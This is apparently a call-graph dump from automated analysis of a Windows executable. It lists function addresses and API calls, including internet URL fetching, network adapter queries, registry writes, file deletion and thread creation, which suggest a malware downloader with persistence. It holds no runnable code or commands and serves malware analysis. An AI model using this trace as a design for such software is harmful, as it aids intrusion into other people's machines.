19029->19023 19034 9c8eed __lock 59 API calls 19029->19034 19033 9c645b strtoxl 59 API calls 19030->19033 19031->19029 19032->19030 19033->19023 19035 9c5cac 19034->19035 19036 9c5d3a 19035->19036 19038 9c3574 _free 59 API calls 19035->19038 19056 9c5d59 19036->19056 19038->19036 19040 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 19039->19040 19041 9c58f2 19040->19041 19042 9c5901 GetOEMCP 19041->19042 19043 9c5913 19041->19043 19044 9c592a 19042->19044 19043->19044 19045 9c5918 GetACP 19043->19045 19044->19022 19044->19023 19045->19044 19047 9c58e2 getSystemCP 61 API calls 19046->19047 19048 9c5dac 19047->19048 19051 9c5dfd IsValidCodePage 19048->19051 19053 9c5db3 setSBCS 19048->19053 19055 9c5e22 _memset __setmbcp_nolock 19048->19055 19049 9c4b4b ___strgtold12_l 6 API calls 19050 9c5c4e 19049->19050 19050->19027 19050->19028 19052 9c5e0f GetCPInfo 19051->19052 19051->19053 19052->19053 19052->19055 19053->19049 19059 9c59af GetCPInfo 19055->19059 19117 9c9057 RtlLeaveCriticalSection 19056->19117 19058 9c5d60 19058->19023 19060 9c5a91 19059->19060 19066 9c59e7 19059->19066 19063 9c4b4b ___strgtold12_l 6 API calls 19060->19063 19065 9c5b3d 19063->19065 19065->19053 19069 9ce21d 19066->19069 19070 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 19069->19070 19071 9ce22e 19070->19071 19079 9ce125 19071->19079 19074 9ce0c1 19075 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 19074->19075 19076 9ce0d2 19075->19076 19092 9cdebd 19076->19092 19080 9ce14c MultiByteToWideChar 19079->19080 19081 9ce13f 19079->19081 19083 9ce178 19080->19083 19091 9ce171 19080->19091 19081->19080 19082 9c4b4b ___strgtold12_l 6 API calls 19084 9c5a48 19082->19084 19085 9ce19a _memset 19083->19085 19087 9c35ac _malloc 59 API calls 19083->19087 19084->19074 19086 9ce1d6 MultiByteToWideChar 19085->19086 19085->19091 19088 9ce200 19086->19088 19089 9ce1f0 GetStringTypeW 19086->19089 19087->19085 19090 9ce107 __freea 59 API calls 19088->19090 19089->19088 19090->19091 19091->19082 19117->19058 19119 9c72d5 19118->19119 19120 9c72c7 19118->19120 19121 9c645b strtoxl 59 API calls 19119->19121 19120->19119 19125 9c72eb 19120->19125 19122 9c72dc 19121->19122 19123 9c54f5 strtoxl 9 API calls 19122->19123 19124 9c72e6 19123->19124 19124->18584 19125->19124 19126 9c645b strtoxl 59 API calls 19125->19126 19126->19122 19128 9cd8e2 RtlEncodePointer 19127->19128 19128->19128 19129 9cd8fc 19128->19129 19129->18591 19133 9c38a8 19130->19133 19132 9c39af 19132->18593 19134 9c38b4 CallCatchBlock 19133->19134 19141 9c8b92 19134->19141 19140 9c38db CallCatchBlock 19140->19132 19142 9c8eed __lock 59 API calls 19141->19142 19143 9c38bd 19142->19143 19144 9c38ec RtlDecodePointer RtlDecodePointer 19143->19144 19145 9c3919 19144->19145 19146 9c38c9 19144->19146 19145->19146 19158 9c975d 19145->19158 19155 9c38e6 19146->19155 19148 9c397c RtlEncodePointer RtlEncodePointer 19148->19146 19149 9c392b 19149->19148 19150 9c3950 19149->19150 19165 9c90fb 19149->19165 19150->19146 19152 9c90fb __realloc_crt 62 API calls 19150->19152 19153 9c396a RtlEncodePointer 19150->19153 19154 9c3964 19152->19154 19153->19148 19154->19146 19154->19153 19192 9c8b9b 19155->19192 19159 9c977b RtlSizeHeap 19158->19159 19160 9c9766 19158->19160 19159->19149 19161 9c645b strtoxl 59 API calls 19160->19161 19162 9c976b 19161->19162 19163 9c54f5 strtoxl 9 API calls 19162->19163 19164 9c9776 19163->19164 19164->19149 19168 9c9102 19165->19168 19167 9c913f 19167->19150 19168->19167 19170 9d09a4 19168->19170 19191 9c9b05 Sleep 19168->19191 19171 9d09ad 19170->19171 19172 9d09b8 19170->19172 19173 9c35ac _malloc 59 API calls 19171->19173 19174 9d09c0 19172->19174 19183 9d09cd 19172->19183 19175 9d09b5 19173->19175 19176 9c3574 _free 59 API calls 19174->19176 19175->19168 19190 9d09c8 _free 19176->19190 19177 9d0a05 19178 9c8803 _malloc RtlDecodePointer 19177->19178 19179 9d09d5 RtlReAllocateHeap 19179->19183 19179->19190 19182 9d0a35 19185 9c645b strtoxl 59 API calls 19182->19185 19183->19177 19183->19179 19183->19182 19184 9c8803 _malloc RtlDecodePointer 19183->19184 19187 9d0a1d 19183->19187 19184->19183 19188 9c645b strtoxl 59 API calls 19187->19188 19190->19168 19191->19168 19195 9c9057 RtlLeaveCriticalSection 19192->19195 19194 9c38eb 19194->19140 19195->19194 19197 9c97bf 19196->19197 19198 9c97c3 TlsFree 19196->19198 19197->18597 19198->18597 19200 9d0ac3 19199->19200 19206 9d0ade 19199->19206 19201 9d0acf 19200->19201 19200->19206 19203 9c645b strtoxl 58 API calls 19201->19203 19202 9d0aee RtlAllocateHeap 19204 9d0ad4 19202->19204 19202->19206 19203->19204 19204->18643 19205 9c8803 _malloc RtlDecodePointer 19205->19206 19206->19202 19206->19204 19206->19205 19207->18647 19214 9c9057 RtlLeaveCriticalSection 19208->19214 19210 9c6344 19210->18657 19215 9c9057 RtlLeaveCriticalSection 19211->19215 19213 9c6392 19213->18660 19214->19210 19215->19213 19217 9c60fb CallCatchBlock 19216->19217 19218 9c6114 19217->19218 19219 9c6203 CallCatchBlock 19217->19219 19220 9c3574 _free 59 API calls 19217->19220 19221 9c3574 _free 59 API calls 19218->19221 19223 9c6123 19218->19223 19219->18674 19220->19218 19221->19223 19222 9c6141 19226 9c6150 19222->19226 19228 9c3574 _free 59 API calls 19222->19228 19224 9c3574 _free 59 API calls 19223->19224 19227 9c6132 19223->19227 19224->19227 19225 9c3574 _free 59 API calls 19225->19222 19229 9c615f 19226->19229 19230 9c3574 _free 59 API calls 19226->19230 19227->19222 19227->19225 19228->19226 19231 9c616e 19229->19231 19233 9c3574 _free 59 API calls 19229->19233 19230->19229 19232 9c6180 19231->19232 19234 9c3574 _free 59 API calls 19231->19234 19235 9c8eed __lock 59 API calls 19232->19235 19233->19231 19234->19232 19238 9c6188 19235->19238 19236 9c61ab 19248 9c620f 19236->19248 19238->19236 19240 9c3574 _free 59 API calls 19238->19240 19240->19236 19241 9c8eed __lock 59 API calls 19246 9c61bf ___removelocaleref 19241->19246 19242 9c61f0 19281 9c621b 19242->19281 19245 9c3574 _free 59 API calls 19245->19219 19246->19242 19251 9c55c5 19246->19251 19284 9c9057 RtlLeaveCriticalSection 19248->19284 19250 9c61b8 19250->19241 19252 9c563e 19251->19252 19253 9c55da 19251->19253 19254 9c568b 19252->19254 19255 9c3574 _free 59 API calls 19252->19255 19253->19252 19261 9c560b 19253->19261 19264 9c3574 _free 59 API calls 19253->19264 19257 9c56b4 19254->19257 19325 9cdb3d 19254->19325 19258 9c565f 19255->19258 19266 9c5713 19257->19266 19276 9c3574 59 API calls _free 19257->19276 19260 9c3574 _free 59 API calls 19258->19260 19262 9c5672 19260->19262 19267 9c3574 _free 59 API calls 19261->19267 19280 9c5629 19261->19280 19268 9c3574 _free 59 API calls 19262->19268 19263 9c3574 _free 59 API calls 19269 9c5633 19263->19269 19270 9c5600 19264->19270 19265 9c3574 _free 59 API calls 19265->19257 19271 9c3574 _free 59 API calls 19266->19271 19273 9c561e 19267->19273 19274 9c5680 19268->19274 19275 9c3574 _free 59 API calls 19269->19275 19285 9cd9da 19270->19285 19272 9c5719 19271->19272 19272->19242 19313 9cdad6 19273->19313 19279 9c3574 _free 59 API calls 19274->19279 19275->19252 19276->19257 19279->19254 19280->19263 19501 9c9057 RtlLeaveCriticalSection 19281->19501 19283 9c61fd 19283->19245 19284->19250 19286 9cd9e9 19285->19286 19312 9cdad2 19285->19312 19287 9cd9fa 19286->19287 19289 9c3574 _free 59 API calls 19286->19289 19288 9cda0c 19287->19288 19290 9c3574 _free 59 API calls 19287->19290 19291 9cda1e 19288->19291 19292 9c3574 _free 59 API calls 19288->19292 19289->19287 19290->19288 19293 9cda30 19291->19293 19294 9c3574 _free 59 API calls 19291->19294 19292->19291 19295 9cda42 19293->19295 19297 9c3574 _free 59 API calls 19293->19297 19294->19293 19296 9cda54 19295->19296 19298 9c3574 _free 59 API calls 19295->19298 19299 9cda66 19296->19299 19300 9c3574 _free 59 API calls 19296->19300 19297->19295 19298->19296 19301 9cda78 19299->19301 19302 9c3574 _free 59 API calls 19299->19302 19300->19299 19303 9cda8a 19301->19303 19305 9c3574 _free 59 API calls 19301->19305 19302->19301 19304 9cda9c 19303->19304 19306 9c3574 _free 59 API calls 19303->19306 19307 9cdaae 19304->19307 19308 9c3574 _free 59 API calls 19304->19308 19305->19303 19306->19304 19309 9c3574 _free 59 API calls 19307->19309 19310 9cdac0 19307->19310 19308->19307 19309->19310 19311 9c3574 _free 59 API calls 19310->19311 19310->19312 19311->19312 19312->19261 19314 9cdae1 19313->19314 19324 9cdb39 19313->19324 19315 9cdaf1 19314->19315 19316 9c3574 _free 59 API calls 19314->19316 19317 9cdb03 19315->19317 19319 9c3574 _free 59 API calls 19315->19319 19316->19315 19318 9cdb15 19317->19318 19320 9c3574 _free 59 API calls 19317->19320 19321 9cdb27 19318->19321 19322 9c3574 _free 59 API calls 19318->19322 19319->19317 19320->19318 19323 9c3574 _free 59 API calls 19321->19323 19321->19324 19322->19321 19323->19324 19324->19280 19326 9cdb4c 19325->19326 19327 9c56a9 19325->19327 19328 9c3574 _free 59 API calls 19326->19328 19327->19265 19329 9cdb54 19328->19329 19330 9c3574 _free 59 API calls 19329->19330 19331 9cdb5c 19330->19331 19332 9c3574 _free 59 API calls 19331->19332 19333 9cdb64 19332->19333 19334 9c3574 _free 59 API calls 19333->19334 19335 9cdb6c 19334->19335 19336 9c3574 _free 59 API calls 19335->19336 19337 9cdb74 19336->19337 19338 9c3574 _free 59 API calls 19337->19338 19339 9cdb7c 19338->19339 19340 9c3574 _free 59 API calls 19339->19340 19341 9cdb83 19340->19341 19342 9c3574 _free 59 API calls 19341->19342 19343 9cdb8b 19342->19343 19344 9c3574 _free 59 API calls 19343->19344 19345 9cdb93 19344->19345 19346 9c3574 _free 59 API calls 19345->19346 19347 9cdb9b 19346->19347 19348 9c3574 _free 59 API calls 19347->19348 19349 9cdba3 19348->19349 19350 9c3574 _free 59 API calls 19349->19350 19351 9cdbab 19350->19351 19352 9c3574 _free 59 API calls 19351->19352 19353 9cdbb3 19352->19353 19354 9c3574 _free 59 API calls 19353->19354 19355 9cdbbb 19354->19355 19356 9c3574 _free 59 API calls 19355->19356 19357 9cdbc3 19356->19357 19358 9c3574 _free 59 API calls 19357->19358 19359 9cdbcb 19358->19359 19501->19283 19502 9bfe99 CreateFileA 19503 9bfeca 19502->19503 19504 9bff95 19502->19504 19505 9bfee2 DeviceIoControl 19503->19505 19506 9bff8b FindCloseChangeNotification 19503->19506 19507 9bff57 GetLastError 19503->19507 19509 9c414c 19503->19509 19505->19503 19506->19504 19507->19503 19507->19506 19512 9c4154 19509->19512 19510 9c35ac _malloc 59 API calls 19510->19512 19511 9c416e 19511->19503 19512->19510 19512->19511 19513 9c8803 _malloc RtlDecodePointer 19512->19513 19514 9c4172 std::exception::exception 19512->19514 19513->19512 19517 9c4b5a 19514->19517 19516 9c419c 19518 9c4b79 RaiseException 19517->19518 19518->19516 19520 40d1e3 lstrcmpiW 19521 9bff9d LoadLibraryA 19522 9c0080 19521->19522 19523 9bffc6 GetProcAddress 19521->19523 19524 9bffda 19523->19524 19525 9c0079 FreeLibrary 19523->19525 19526 9bffec GetAdaptersInfo 19524->19526 19527 9c0074 19524->19527 19528 9c414c _Allocate 60 API calls 19524->19528 19525->19522 19526->19524 19527->19525 19528->19524 19529 9ef272 19530 9ef27b 19529->19530 19531 9ef2a0 19529->19531 19530->19531 19532 a512b1 DeleteFileA 19530->19532 19533 a2938f 19534 a29a24 Sleep 19533->19534 19535 40286e CreateThread 19536 40d73d 19535->19536 19537 4022cb 19535->19537 19538 40d699 19537->19538 19539 9b69cb RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 19578 9b42c7 19539->19578 19579 403112 GetVersion 19603 40344a HeapCreate 19579->19603 19581 403171 19582 403176 19581->19582 19583 40317e 19581->19583 19678 40322d 19582->19678 19615 404ee6 19583->19615 19587 403186 GetCommandLineA 19629 404db4 19587->19629 19591 4031a0 19661 404aae 19591->19661 19593 4031a5 19594 4031aa GetStartupInfoA 19593->19594 19674 404a56 19594->19674 19596 4031bc GetModuleHandleA 19598 4031e0 19596->19598 19684 4047fd 19598->19684 19604 4034a0 19603->19604 19605 40346a 19603->19605 19604->19581 19691 403302 19605->19691 19608 403486 19611 4034a3 19608->19611 19705 403cf8 19608->19705 19609 403479 19703 4034a7 HeapAlloc 19609->19703 19611->19581 19612 403483 19612->19611 19614 403494 HeapDestroy 19612->19614 19614->19604 19768 403010 19615->19768 19618 404f05 GetStartupInfoA 19626 405016 19618->19626 19628 404f51 19618->19628 19621 40507d SetHandleCount 19621->19587 19622 40503d GetStdHandle 19624 40504b GetFileType 19622->19624 19622->19626 19623 403010 12 API calls 19623->19628 19624->19626 19625 404fc2 19625->19626 19627 404fe4 GetFileType 19625->19627 19626->19621 19626->19622 19627->19625 19628->19623 19628->19625 19628->19626 19630 404e02 19629->19630 19631 404dcf GetEnvironmentStringsW 19629->19631 19632 404dd7 19630->19632 19633 404df3 19630->19633 19631->19632 19634 404de3 GetEnvironmentStrings 19631->19634 19636 404e1b WideCharToMultiByte 19632->19636 19637 404e0f GetEnvironmentStringsW 19632->19637 19635 403196 19633->19635 19638 404ea1 19633->19638 19639 404e95 GetEnvironmentStrings 19633->19639 19634->19633 19634->19635 19652 404b67 19635->19652 19641 404e81 FreeEnvironmentStringsW 19636->19641 19642 404e4f 19636->19642 19637->19635 19637->19636 19643 403010 12 API calls 19638->19643 19639->19635 19639->19638 19641->19635 19644 403010 12 API calls 19642->19644 19649 404ebc 19643->19649 19645 404e55 19644->19645 19645->19641 19646 404e5e WideCharToMultiByte 19645->19646 19648 404e6f 19646->19648 19651 404e78 19646->19651 19647 404ed2 FreeEnvironmentStringsA 19647->19635 19834 403251 19648->19834 19649->19647 19651->19641 19653 404b79 19652->19653 19654 404b7e GetModuleFileNameA 19652->19654 19864 406707 19653->19864 19656 404ba1 19654->19656 19657 403010 12 API calls 19656->19657 19658 404bc2 19657->19658 19659 404bd2 19658->19659 19660 403208 7 API calls 19658->19660 19659->19591 19660->19659 19662 404abb 19661->19662 19664 404ac0 19661->19664 19663 406707 19 API calls 19662->19663 19663->19664 19665 403010 12 API calls 19664->19665 19666 404aed 19665->19666 19667 403208 7 API calls 19666->19667 19673 404b01 19666->19673 19667->19673 19668 404b44 19669 403251 7 API calls 19668->19669 19670 404b50 19669->19670 19670->19593 19671 403010 12 API calls 19671->19673 19672 403208 7 API calls 19672->19673 19673->19668 19673->19671 19673->19672 19675 404a5f 19674->19675 19677 404a64 19674->19677 19676 406707 19 API calls 19675->19676 19676->19677 19677->19596 19679 403236 19678->19679 19680 40323b 19678->19680 19681 405264 7 API calls 19679->19681 19682 40529d 7 API calls 19680->19682 19681->19680 19683 403244 ExitProcess 19682->19683 19888 40481f 19684->19888 19687 4048d2 19688 4048de 19687->19688 19689 404a07 UnhandledExceptionFilter 19688->19689 19690 4031fa 19688->19690 19689->19690 19714 402ef0 19691->19714 19694 403345 GetEnvironmentVariableA 19696 403422 19694->19696 19699 403364 19694->19699 19695 40332b 19695->19694 19697 40333d 19695->19697 19696->19697 19719 4032d5 GetModuleHandleA 19696->19719 19697->19608 19697->19609 19700 4033a9 GetModuleFileNameA 19699->19700 19701 4033a1 19699->19701 19700->19701 19701->19696 19716 4053f0 19701->19716 19704 4034c3 19703->19704 19704->19612 19706 403d05 19705->19706 19707 403d0c HeapAlloc 19705->19707 19708 403d29 VirtualAlloc 19706->19708 19707->19708 19713 403d61 19707->19713 19709 403d49 VirtualAlloc 19708->19709 19710 403e1e 19708->19710 19711 403e10 VirtualFree 19709->19711 19709->19713 19712 403e26 HeapFree 19710->19712 19710->19713 19711->19710 19712->19713 19713->19612 19715 402efc GetVersionExA 19714->19715 19715->19694 19715->19695 19721 405407 19716->19721 19720 4032ec 19719->19720 19720->19697 19723 40541f 19721->19723 19724 40544f 19723->19724 19728 405c3b 19723->19728 19725 405403 19724->19725 19726 405c3b 6 API calls 19724->19726 19732 4068ae 19724->19732 19725->19696 19726->19724 19729 405c59 19728->19729 19731 405c4d 19728->19731 19738 40697a 19729->19738 19731->19723 19733 4068d9 19732->19733 19737 4068bc 19732->19737 19734 4068f5 19733->19734 19735 405c3b 6 API calls 19733->19735 19734->19737 19750 406ac3 19734->19750 19735->19734 19737->19724 19739 4069c3 19738->19739 19740 4069ab GetStringTypeW 19738->19740 19741 406a12 19739->19741 19742 4069ee GetStringTypeA 19739->19742 19740->19739 19743 4069c7 GetStringTypeA 19740->19743 19745 406aaf 19741->19745 19746 406a28 MultiByteToWideChar 19741->19746 19742->19745 19743->19739 19743->19745 19745->19731 19746->19745 19747 406a4c 19746->19747 19747->19745 19748 406a86 MultiByteToWideChar 19747->19748 19748->19745 19749 406a9f GetStringTypeW 19748->19749 19749->19745 19751 406af3 LCMapStringW 19750->19751 19752 406b0f 19750->19752 19751->19752 19753 406b17 LCMapStringA 19751->19753 19754 406b75 19752->19754 19755 406b58 LCMapStringA 19752->19755 19753->19752 19762 406c51 19753->19762 19756 406b8b MultiByteToWideChar 19754->19756 19754->19762 19755->19762 19757 406bb5 19756->19757 19756->19762 19758 406beb MultiByteToWideChar 19757->19758 19757->19762 19759 406c04 LCMapStringW 19758->19759 19758->19762 19760 406c1f 19759->19760 19759->19762 19761 406c25 19760->19761 19764 406c65 19760->19764 19761->19762 19763 406c33 LCMapStringW 19761->19763 19762->19737 19763->19762 19764->19762 19765 406c9d LCMapStringW 19764->19765 19765->19762 19766 406cb5 WideCharToMultiByte 19765->19766 19766->19762 19777 403022 19768->19777 19771 403208 19772 403211 19771->19772 19773 403216 19771->19773 19814 405264 19772->19814 19820 40529d 19773->19820 19778 40301f 19777->19778 19780 403029 19777->19780 19778->19618 19778->19771 19780->19778 19781 40304e 19780->19781 19782 40305d 19781->19782 19785 403072 19781->19785 19789 40306b 19782->19789 19790 403843 19782->19790 19784 4030b1 HeapAlloc 19786 4030c0 19784->19786 19785->19784 19785->19789 19796 403ff0 19785->19796 19786->19780 19787 403070 19787->19780 19789->19784 19789->19786 19789->19787 19794 403875 19790->19794 19791 403914 19793 403923 19791->19793 19810 403bfd 19791->19810 19793->19789 19794->19791 19794->19793 19803 403b4c 19794->19803 19797 403ffe 19796->19797 19798 4041bf 19797->19798 19801 4040ea VirtualAlloc 19797->19801 19802 4040bb 19797->19802 19799 403cf8 5 API calls 19798->19799 19799->19802 19801->19802 19802->19789 19804 403b8f HeapAlloc 19803->19804 19805 403b5f HeapReAlloc 19803->19805 19807 403bb5 VirtualAlloc 19804->19807 19809 403bdf 19804->19809 19806 403b7e 19805->19806 19805->19809 19806->19804 19808 403bcf HeapFree 19807->19808 19807->19809 19808->19809 19809->19791 19811 403c0f VirtualAlloc 19810->19811 19813 403c58 19811->19813 19813->19793 19815 40526e 19814->19815 19816 40529d 7 API calls 19815->19816 19819 40529b 19815->19819 19817 405285 19816->19817 19818 40529d 7 API calls 19817->19818 19818->19819 19819->19773 19823 4052b0 19820->19823 19821 40321f 19821->19618 19822 4053c7 19825 4053da GetStdHandle WriteFile 19822->19825 19823->19821 19823->19822 19824 4052f0 19823->19824 19824->19821 19826 4052fc GetModuleFileNameA 19824->19826 19825->19821 19827 405314 19826->19827 19829 406723 19827->19829 19830 406730 LoadLibraryA 19829->19830 19832 406772 19829->19832 19831 406741 GetProcAddress 19830->19831 19830->19832 19831->19832 19833 406758 GetProcAddress GetProcAddress 19831->19833 19832->19821 19833->19832 19835 403279 19834->19835 19836 40325d 19834->19836 19835->19651 19837 403267 19836->19837 19838 40327d 19836->19838 19840 4032a9 HeapFree 19837->19840 19841 403273 19837->19841 19839 4032a8 19838->19839 19843 403297 19838->19843 19839->19840 19840->19835 19845 40351a 19841->19845 19851 403fab 19843->19851 19846 40380e 19845->19846 19847 403558 19845->19847 19846->19835 19847->19846 19848 403754 VirtualFree 19847->19848 19849 4037b8 19848->19849 19849->19846 19850 4037c7 VirtualFree HeapFree 19849->19850 19850->19846 19852 403fd8 19851->19852 19854 403fee 19851->19854 19852->19854 19855 403e92 19852->19855 19854->19835 19858 403e9f 19855->19858 19856 403f4f 19856->19854 19857 403ec0 VirtualFree 19857->19858 19858->19856 19858->19857 19860 403e3c VirtualFree 19858->19860 19861 403e59 19860->19861 19862 403e89 19861->19862 19863 403e69 HeapFree 19861->19863 19862->19858 19863->19858 19865 406710 19864->19865 19866 406717 19864->19866 19868 406343 19865->19868 19866->19654 19875 4064dc 19868->19875 19870 4064d0 19870->19866 19873 406386 GetCPInfo 19874 40639a 19873->19874 19874->19870 19880 406582 GetCPInfo 19874->19880 19876 4064fc 19875->19876 19877 4064ec GetOEMCP 19875->19877 19878 406354 19876->19878 19879 406501 GetACP 19876->19879 19877->19876 19878->19870 19878->19873 19878->19874 19879->19878 19883 4065a5 19880->19883 19887 40666d 19880->19887 19881 40697a 6 API calls 19882 406621 19881->19882 19884 406ac3 9 API calls 19882->19884 19883->19881 19885 406645 19884->19885 19886 406ac3 9 API calls 19885->19886 19886->19887 19887->19870 19889 40482b GetCurrentProcess TerminateProcess 19888->19889 19890 40483c 19888->19890 19889->19890 19891 4031e9 19890->19891 19892 4048a6 ExitProcess 19890->19892 19891->19687 19893 4028f4 RegSetValueExA RegCloseKey 19894 40d63e SetEvent 19893->19894 19895 9b104d 19896 9c39a4 __cinit 68 API calls 19895->19896 19897 9b1057 19896->19897 19900 9b1aa9 InterlockedIncrement 19897->19900 19901 9b105c 19900->19901 19902 9b1ac5 WSAStartup InterlockedExchange 19900->19902 19902->19901 19903 402277 19904 40d2dd Sleep 19903->19904 19905 40d9fd 19904->19905 19906 402658 19907 40dbee RegCreateKeyExA 19906->19907 19908 40da78 19909 40da37 19908->19909 19911 40da41 19908->19911 19909->19911 19912 401f27 19909->19912 19911->19911 19913 401f3c 19912->19913 19916 401a1d 19913->19916 19915 401f45 19915->19911 19917 401a2c 19916->19917 19922 401a4f CreateFileA 19917->19922 19921 401a3e 19921->19915 19923 401a35 19922->19923 19928 401a7d 19922->19928 19930 401b4b LoadLibraryA 19923->19930 19924 401a98 DeviceIoControl 19924->19928 19925 401b3a FindCloseChangeNotification 19925->19923 19927 401b0e GetLastError 19927->19925 19927->19928 19928->19924 19928->19925 19928->19927 19939 402e56 19928->19939 19942 402e48 19928->19942 19931 401c21 19930->19931 19932 401b6e GetProcAddress 19930->19932 19931->19921 19933 401c18 FreeLibrary 19932->19933 19937 401b85 19932->19937 19933->19931 19934 401b95 GetAdaptersInfo 19934->19937 19935 402e56 7 API calls 19935->19937 19936 401c15 19936->19933 19937->19934 19937->19935 19937->19936 19938 402e48 12 API calls 19937->19938 19938->19937 19940 403251 7 API calls 19939->19940 19941 402e5f 19940->19941 19941->19928 19943 403022 12 API calls 19942->19943 19944 402e53 19943->19944 19944->19928 19945 9b78a7 InternetOpenA 19946 9b78c5 InternetSetOptionA InternetSetOptionA InternetSetOptionA 19945->19946 19955 9b7985 _memset 19945->19955 20048 9c50f0 19946->20048 19949 9b797e InternetCloseHandle 19949->19955 19950 9b6d0a RtlEnterCriticalSection RtlLeaveCriticalSection 19960 9b6cf0 _memset 19950->19960 19952 9b6d04 Sleep 19952->19950 19953 9b793e InternetReadFile 19954 9b7973 InternetCloseHandle 19953->19954 19954->19949 19956 9b79e5 RtlEnterCriticalSection RtlLeaveCriticalSection 19955->19956 19955->19960 20050 9c293c 19956->20050 19958 9b7a0f 19959 9b7a5f 19958->19959 19962 9c293c 66 API calls 19958->19962 19959->19960 19961 9c293c 66 API calls 19959->19961 19960->19950 19960->19952 19963 9b7a80 19961->19963 19964 9b7a23 19962->19964 19965 9b7d39 19963->19965 19968 9c35ac _malloc 59 API calls 19963->19968 19964->19959 19967 9c293c 66 API calls 19964->19967 19966 9c293c 66 API calls 19965->19966 19969 9b7d51 19966->19969 19970 9b7a37 19967->19970 19971 9b7a99 RtlEnterCriticalSection RtlLeaveCriticalSection 19968->19971 19972 9b7d9e 19969->19972 19973 9b7d5b _memset 19969->19973 19970->19959 19975 9c293c 66 API calls 19970->19975 19998 9b7ad1 _memset 19971->19998 19974 9c293c 66 API calls 19972->19974 19978 9b7d6b RtlEnterCriticalSection RtlLeaveCriticalSection 19973->19978 19976 9b7dac 19974->19976 19977 9b7a4b 19975->19977 19979 9b7db2 19976->19979 19980 9b7dd1 19976->19980 19977->19959 19982 9c293c 66 API calls 19977->19982 19978->19960 20103 9b65a9 19979->20103 19983 9c293c 66 API calls 19980->19983 19982->19959 19984 9b7ddf 19983->19984 19985 9b8100 19984->19985 19989 9b7df1 19984->19989 19986 9c293c 66 API calls 19985->19986 19987 9b810e 19986->19987 19987->19960 19988 9c35ac _malloc 59 API calls 19987->19988 19994 9b8122 _memset 19988->19994 19989->19960 20133 9c2a18 19989->20133 19993 9b7eaa 19995 9b7ee2 RtlEnterCriticalSection 19993->19995 19999 9b814f 19994->19999 20205 9b5461 19994->20205 19996 9b7f0f RtlLeaveCriticalSection 19995->19996 19997 9b7f05 19995->19997 20153 9b3c67 19996->20153 19997->19996 20003 9c293c 66 API calls 19998->20003 20008 9b7b5e 19998->20008 20001 9c3574 _free 59 API calls 19999->20001 20000 9c35ac _malloc 59 API calls 20009 9b7b96 _memset 20000->20009 20001->19960 20003->20008 20008->20000 20012 9b7bf8 20009->20012 20106 9c3be6 20009->20106 20014 9c3574 _free 59 API calls 20012->20014 20013 9b80e7 20198 9b95f9 20013->20198 20018 9b7bfe 20014->20018 20018->19965 20020 9c414c _Allocate 60 API calls 20018->20020 20019 9b80af 20183 9b89e0 20019->20183 20023 9b7c0e 20020->20023 20028 9b7c29 20023->20028 20118 9b9d2d 20023->20118 20027 9bad1b 73 API calls 20034 9b801a 20027->20034 20060 9bae45 20028->20060 20029 9b7bc4 20029->20012 20032 9c3be6 _strtok 60 API calls 20029->20032 20115 9c2e50 20029->20115 20032->20029 20033 9b7c3f 20064 9b522d 20033->20064 20034->20019 20035 9bad1b 73 API calls 20034->20035 20037 9b806b 20035->20037 20037->20019 20178 9bd70d 20037->20178 20039 9b7c88 20093 9bb205 20039->20093 20042 9b7ce8 shared_ptr 20043 9b7ced Sleep 20042->20043 20125 9c1ef0 20043->20125 20049 9b791e InternetOpenUrlA 20048->20049 20049->19949 20049->19953 20053 9c2948 20050->20053 20055 9c296b 20050->20055 20052 9c294e 20054 9c645b strtoxl 59 API calls 20052->20054 20053->20052 20053->20055 20057 9c2953 20054->20057 20215 9c2983 20055->20215 20056 9c297e 20056->19958 20058 9c54f5 strtoxl 9 API calls 20057->20058 20059 9c295e 20058->20059 20059->19958 20061 9bae4f __EH_prolog 20060->20061 20225 9be5f6 20061->20225 20063 9bae6d shared_ptr 20063->20033 20065 9b5237 __EH_prolog 20064->20065 20229 9c1110 20065->20229 20068 9b3c67 72 API calls 20069 9b525e 20068->20069 20070 9b3d7e 64 API calls 20069->20070 20071 9b526c 20070->20071 20072 9b8931 89 API calls 20071->20072 20073 9b5280 20072->20073 20074 9b5436 shared_ptr 20073->20074 20075 9bad1b 73 API calls 20073->20075 20074->20039 20076 9b52b1 20075->20076 20076->20074 20077 9b530a 20076->20077 20078 9b52d8 20076->20078 20079 9bad1b 73 API calls 20077->20079 20080 9bad1b 73 API calls 20078->20080 20082 9b531b 20079->20082 20081 9b52e8 20080->20081 20081->20074 20084 9bad1b 73 API calls 20081->20084 20082->20074 20083 9bad1b 73 API calls 20082->20083 20085 9b535e 20083->20085 20086 9b53c8 20084->20086 20085->20074 20087 9bad1b 73 API calls 20085->20087 20086->20074 20088 9bad1b 73 API calls 20086->20088 20087->20081 20089 9b53ee 20088->20089 20089->20074 20090 9bad1b 73 API calls 20089->20090 20091 9b5418 20090->20091 20233 9bd4cf 20091->20233 20094 9bb20f __EH_prolog 20093->20094 20260 9bd6e4 20094->20260 20096 9bb230 shared_ptr 20263 9c26f0 20096->20263 20098 9bb247 20099 9b7cd5 20098->20099 20269 9b3fb0 20098->20269 20099->20042 20099->20043 20104 9c35ac _malloc 59 API calls 20103->20104 20105 9b65bc 20104->20105 20107 9c625a CallCatchBlock 59 API calls 20106->20107 20109 9c3c03 20107->20109 20108 9c3ca7 20711 9c9c76 20108->20711 20109->20108 20112 9c3c1c 20109->20112 20113 9c4b4b ___strgtold12_l 6 API calls 20112->20113 20114 9c3ca3 20113->20114 20114->20029 20718 9c2e6e 20115->20718 20117 9c2e69 20117->20029 20119 9b9d37 __EH_prolog 20118->20119 20120 9b1ba7 210 API calls 20119->20120 20121 9b9d8c 20120->20121 20122 9b9da9 RtlEnterCriticalSection 20121->20122 20123 9b9dc7 RtlLeaveCriticalSection 20122->20123 20124 9b9dc4 20122->20124 20123->20028 20124->20123 20134 9c2a49 20133->20134 20135 9c2a34 20133->20135 20134->20135 20137 9c2a50 20134->20137 20136 9c645b strtoxl 59 API calls 20135->20136 20138 9c2a39 20136->20138 20726 9c6650 20137->20726 20140 9c54f5 strtoxl 9 API calls 20138->20140 20142 9b7e27 20140->20142 20144 9b1ba7 20142->20144 20951 9d59f0 20144->20951 20146 9b1bb1 RtlEnterCriticalSection 20147 9b1be9 RtlLeaveCriticalSection 20146->20147 20149 9b1bd1 20146->20149 20952 9be926 20147->20952 20149->20147 20150 9b1c55 RtlLeaveCriticalSection 20149->20150 20150->19993 20151 9b1c22 20151->20150 